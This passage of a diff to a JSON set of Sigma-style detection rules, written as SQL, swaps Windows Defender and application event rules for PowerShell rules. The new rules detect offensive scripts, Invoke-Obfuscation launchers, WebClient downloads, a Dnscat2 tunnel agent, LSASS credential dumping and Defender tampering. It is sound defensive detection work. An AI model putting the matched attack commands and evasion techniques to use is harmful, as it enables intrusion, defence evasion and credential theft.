'\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" ], - "filename": "win_vul_cve_2021_41379.yml" + "filename": "posh_pm_exploit_scripts.yml" }, { - "title": "Microsoft Malware Protection Engine Crash", - "id": "6c82cf5c-090d-4d57-9188-533577631108", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "status": "experimental", - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "MsMpEng.exe can crash when C:\\ is full" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND ((Provider_Name = 'Application Error' AND EventID = '1000') OR (Provider_Name = 'Windows Error Reporting' AND EventID = '1001')) AND (Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "win_susp_msmpeng_crash.yml" + 
"filename": "posh_pm_invoke_obfuscation_via_var.yml" }, { - "title": "MSI Installation From Web", - "id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", + "id": "daf7eb81-35fd-410d-9d7a-657837e602bb", "status": "experimental", - "description": "Detects installation of a remote msi file from web.", - "author": "Stamatis Chatzimangou", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1218", - "attack.t1218.007" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND Data LIKE '%://%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Compress-Archive %' ESCAPE '\\' AND ContextInfo LIKE '% -Path %' ESCAPE '\\' AND ContextInfo LIKE '% -DestinationPath %' ESCAPE '\\' AND ContextInfo LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "win_msi_install_from_web.yml" + "filename": "posh_pm_susp_zip_compress.yml" }, { - "title": "Atera Agent Installation", - "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", - "status": "test", - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", + "id": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "status": "experimental", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + 
"attack.t1059.001" ], "falsepositives": [ - "Legitimate Atera agent installation" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%rundll32.exe%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND Payload LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "win_software_atera_rmm_agent_install.yml" + "filename": "posh_pm_invoke_obfuscation_via_rundll.yml" }, { - "title": "Restricted Software Access By SRP", - "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", + "id": "38a7625e-b2cb-485d-b83d-aff137d859f4", "status": "experimental", - "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1072" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (ContextInfo LIKE '%-ModuleName %' ESCAPE '\\' OR ContextInfo LIKE '%-ModulePath %' ESCAPE '\\' OR ContextInfo LIKE '%-ScriptBlock %' ESCAPE 
'\\' OR ContextInfo LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "win_software_restriction_policies_block.yml" + "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml" }, { - "title": "Audit CVE Event", - "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "status": "experimental", - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "author": "Florian Roth (Nextron Systems), Zach Mathis", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", - "attack.impact", - "attack.t1499.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "win_audit_cve.yml" + "filename": "posh_pm_invoke_obfuscation_var.yml" }, { - "title": "Potential Credential Dumping Via WER - Application", - "id": 
"a18e0862-127b-43ca-be12-1a542c75c7c5", + "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", "status": "experimental", - "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate crashing of the lsass process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_werfault_susp_lsass_credential_dump.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Windows Defender Suspicious Configuration Changes", - "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", - "status": "stable", - "description": "Detects suspicious changes to the windows defender configuration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", + "status": "experimental", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" 
], "falsepositives": [ - "Administrator activity (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" ], - "filename": "win_defender_suspicious_features_tampering.yml" + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" }, { - "title": "Win Defender Restored Quarantine File", - "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "title": "Suspicious PowerShell Download - PoshModule", + "id": "de41232e-12e8-49fa-86bc-c05c7e722df9", "status": "experimental", - "description": "Detects the restoration of files from the defender quarantine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrator activity restoring a file" + "PowerShell scripts that download content from the Internet" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND 
EventID = '1009')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ContextInfo LIKE '%.DownloadFile(%' ESCAPE '\\' OR ContextInfo LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "win_defender_restored_quarantine_file.yml" + "filename": "posh_pm_susp_download.yml" }, { - "title": "Windows Defender Exploit Guard Tamper", - "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", - "status": "experimental", - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Alternate PowerShell Hosts - PowerShell Module", + "id": "64e8e417-c19a-475a-8d19-98ea705394cc", + "status": "test", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows 
Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ContextInfo LIKE '%' ESCAPE '\\' AND NOT (((ContextInfo LIKE '%= powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/System32/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\')) OR (ContextInfo LIKE '%= C:\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe -Embedding%' ESCAPE '\\') OR (ContextInfo LIKE '%ConfigSyncRun.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\dsac.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\wsmprovhost.exe -Embedding%' ESCAPE '\\') OR ((Payload LIKE '%Update-Help%' ESCAPE '\\' OR Payload LIKE '%Failed to update Help for the module%' ESCAPE '\\'))))" ], - "filename": "win_defender_exploit_guard_tamper.yml" + "filename": "posh_pm_alternate_powershell_hosts.yml" }, { - "title": "LSASS Access Detected via Attack Surface Reduction", - "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", - "status": "experimental", - "description": "Detects Access to LSASS Process", - "author": "Markus Neis", + "title": "Silence.EDA Detection", + "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "status": "test", + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "author": "Alina Stepchenkova, Group-IB, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", + "attack.impact", + "attack.t1529", + 
"attack.g0091", + "attack.s0363" ], "falsepositives": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' 
AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" ], - "filename": "win_defender_alert_lsass_access.yml" + "filename": "posh_ps_apt_silence_eda.yml" }, { - "title": "Windows Defender Exclusions Added", - "id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", - "status": "stable", - "description": "Detects the Setting of Windows Defender Exclusions", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator actions" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND NewValue LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_defender_exclusions.yml" + "filename": 
"posh_ps_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "PSExec and WMI Process Creations Block", - "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "title": "DirectorySearcher Powershell Exploitation", + "id": "1f6399cf-2c80-4924-ace1-6fcff3393480", "status": "test", - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "author": "Bhabesh Raj", + "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "author": "frack113", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object %' ESCAPE '\\' AND ScriptBlockText LIKE '%System.DirectoryServices.DirectorySearcher%' ESCAPE '\\' AND ScriptBlockText LIKE '%.PropertiesToLoad.Add%' ESCAPE '\\' AND ScriptBlockText LIKE '%.findall()%' ESCAPE '\\' AND ScriptBlockText LIKE '%Properties.name%' ESCAPE '\\')" ], - "filename": "win_defender_psexec_wmi_asr.yml" + "filename": "posh_ps_directorysearcher.yml" }, { - "title": "Windows Defender AMSI Trigger Detected", - "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "status": "stable", - "description": "Detects triggering of AMSI by Windows Defender.", - "author": "Bhabesh Raj", + "title": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", + "id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", + "status": "experimental", + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a 
file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% > %' ESCAPE '\\' OR ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" ], - "filename": "win_defender_amsi_trigger.yml" + "filename": "posh_ps_user_discovery_get_aduser.yml" }, { - "title": "Microsoft Defender Tamper Protection Trigger", - "id": "49e5bc24-8b86-49f1-b743-535f332c2856", - "status": "stable", - "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", - "author": "Bhabesh Raj, Nasreddine Bencherchali", + "title": "Clearing Windows Console History", + "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "status": "test", + "description": "Identifies when a user attempts to clear console history. 
An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1070.003" ], "falsepositives": [ - "Administrator might try to disable defender features during testing (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" ], - "filename": "win_defender_tamper_protection_trigger.yml" + "filename": "posh_ps_clearing_windows_console_history.yml" }, { - "title": "Windows Defender Threat Detection Disabled", - "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "status": "stable", - "description": "Detects disabling Windows Defender threat protection", - "author": "Ján Trenčanský, frack113", + "title": 
"Disable-WindowsOptionalFeature Command PowerShell", + "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "status": "experimental", + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Administrator actions (should be investigated)", - "Seen being triggered occasionally during Windows 8 Defender Updates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" ], - "filename": "win_defender_disabled.yml" + "filename": "posh_ps_disable_windows_optional_feature.yml" }, { - "title": "Windows Defender Threat Detected", - "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "status": "stable", - "description": "Detects all actions taken by Windows Defender malware detection engines", - "author": "Ján Trenčanský", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation 
framework from the following code block \\u2014", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" ], - "filename": "win_defender_threat.yml" + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Important Scheduled Task Deleted", - "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "title": "Suspicious PowerShell Download - Powershell Script", + "id": 